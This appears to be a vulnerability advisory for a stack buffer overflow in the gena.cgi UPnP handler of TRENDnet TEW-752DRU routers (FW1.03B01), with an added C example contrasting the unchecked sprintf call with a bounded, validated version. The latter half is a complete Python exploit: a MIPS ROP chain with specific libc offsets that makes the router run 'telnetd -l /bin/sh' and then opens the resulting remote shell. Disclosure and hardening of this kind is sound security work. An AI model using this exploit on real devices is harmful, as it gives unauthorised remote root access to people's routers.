Vendor of the products: TRENDnet
Vendor's website: http://www.trendnet.com.cn/
Reported by: Chen Xiao(2235254941@qq.com)
Affected products: TRENDnet TEW-752DRU Routers
Affected firmware version: FW1.03B01
Firmware download address: TRENDnet TEW-752DRU
In TRENDnet TEW-752DRU routers running FW1.03B01, there is a stack-based buffer overflow caused by missing length validation of the service field handled by gena.cgi. An attacker who successfully exploits it can crash the remote device or execute arbitrary commands by sending a crafted HTTP request (method UNSUBSCRIBE) to /gena.cgi.
The function at address 0x40E9BC in the /htdocs/cgibin binary passes the SID header and the service field to sprintf without checking their length, so an over-long value overflows the fixed-size stack buffer.
Injecting oversized data into v2 or a1 therefore causes a buffer overflow, which can be used for code execution or to trigger a denial of service. Here v2 is HTTP_SID and a1 is service, both of which are attacker-controlled.
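The following C example is added for illustration and is not the router's code. It shows the shape of the sprintf bug described above next to a bounded replacement that rejects the kind of input the exploit below sends. The buffer size (512), the format string, the per-field caps and the function names are assumptions; the advisory only states that sprintf is called on HTTP_SID and service with no length check.

```c
/* Added example, not vendor code. Buffer size, format string, field caps and
 * function names are assumptions made for illustration. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

#define LINE_BUF    512   /* assumed size of the stack buffer in the handler */
#define MAX_SID     64    /* assumed cap: UPnP SIDs are short "uuid:..." strings */
#define MAX_SERVICE 128   /* assumed cap: service IDs are short URN-like names */

/* Vulnerable shape: attacker-controlled HTTP_SID (v2) and service (a1) are
 * formatted into a fixed stack buffer. sprintf does not know how large buf is,
 * so a long service value runs past it into the saved registers and return
 * address, which is what the ROP chain in this advisory relies on.
 * Kept for illustration only; never call it with untrusted input. */
void gena_unsubscribe_vulnerable(const char *http_sid, const char *service)
{
    char buf[LINE_BUF];
    sprintf(buf, "UNSUBSCRIBE sid=%s service=%s", http_sid, service);
    puts(buf);
}

/* Bytes the format would need, i.e. the check the vulnerable code never makes. */
size_t gena_formatted_len(const char *http_sid, const char *service)
{
    int n = snprintf(NULL, 0, "UNSUBSCRIBE sid=%s service=%s", http_sid, service);
    return n < 0 ? 0 : (size_t)n;
}

/* Length of s, but stops scanning after cap bytes; returns cap + 1 when s is
 * longer than cap, so the caller never walks an unbounded string. */
static size_t len_capped(const char *s, size_t cap)
{
    size_t n = 0;
    while (n <= cap && s[n] != '\0')
        n++;
    return n;
}

/* Hardened replacement: per-field limits, a character allow-list for the
 * service identifier, and a bounded format with truncation detection.
 * Returns 0 on success, -1 when the request is rejected. out is always
 * NUL-terminated on return. */
int gena_unsubscribe_hardened(char *out, size_t outlen,
                              const char *http_sid, const char *service)
{
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (http_sid == NULL || service == NULL)
        return -1;

    /* Reject oversize fields before formatting anything. */
    if (len_capped(http_sid, MAX_SID) > MAX_SID)
        return -1;
    if (len_capped(service, MAX_SERVICE) > MAX_SERVICE)
        return -1;

    /* Only characters a service identifier can legitimately contain. This also
     * stops shell metacharacters such as ';' from reaching any later command. */
    for (const char *p = service; *p != '\0'; p++) {
        if (!(isalnum((unsigned char)*p) || strchr(":-_.", *p) != NULL))
            return -1;
    }

    int n = snprintf(out, outlen, "UNSUBSCRIBE sid=%s service=%s", http_sid, service);
    if (n < 0 || (size_t)n >= outlen) {   /* output would have been truncated */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed input in the shape of the exploit's service value: 462 bytes of
 * filler, 16 bytes where the four ROP words sit, 0x18 bytes of padding and the
 * command string. The buffer is static so callers can inspect it. */
const char *gena_exploit_style_service(void)
{
    static char svc[462 + 16 + 0x18 + 32];
    memset(svc, 'a', 462 + 16 + 0x18);
    strcpy(svc + 462 + 16 + 0x18, "telnetd -l /bin/sh;");
    return svc;
}
```

With a realistic SID and service the hardened function produces the formatted line; with the exploit-shaped value it refuses before snprintf runs, and even if the caps were removed the truncation check would still stop the overflow.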
The function at 0x40E9BC is called from genacgi_main when it handles an UNSUBSCRIBE request, so the request method must be UNSUBSCRIBE.
The /etc/services/HTTP/httpsvcs.php file shows that gena.cgi belongs to the UPnP service. The upnpsetup function in the same file shows that this UPnP HTTP service listens on port 49152, so the request is sent to that port.
Send the following UNSUBSCRIBE request to inject a malicious command through the service field.
# python3
# Exploit for the gena.cgi stack overflow in FW1.03B01: the ROP chain calls
# system() on a command placed on the stack, which starts telnetd on the router.
from pwn import p32, context
import socket
import os
import time

context(os='linux', arch='mips')          # p32 packs for the router's MIPS endianness

target = "192.168.10.1"                   # router LAN address
libc_base = 0x2aaf8000                    # libc load address on the device

cmd = b'telnetd -l /bin/sh;'              # executed by system() once the chain runs

payload = b'a' * 462                      # filler up to the saved registers
payload += p32(libc_base + 0x53200 - 1)   # s0: system_addr - 1 (fixed up by the addiu gadget)
payload += p32(libc_base + 0x169C4)       # s1: addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += b'a' * 4                       # s2: unused
payload += p32(libc_base + 0x32A98)       # ra: addiu $s0, 1 (=> jalr $s1)
payload += b'a' * 0x18                    # padding up to $sp+0x18
payload += cmd                            # command string picked up from the stack

# The overflow is in the service query parameter; the method must be UNSUBSCRIBE.
msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 49152))                # UPnP HTTP port found in upnpsetup
s.sendall(msg)
s.close()
time.sleep(1)                             # give telnetd a moment to start
os.system("telnet %s 23" % target)        # connect to the shell spawned on the router
After the request is sent, the injected command has started telnetd on the device: the Telnet service on port 23 is now active, and connecting to it gives a remote shell on the router.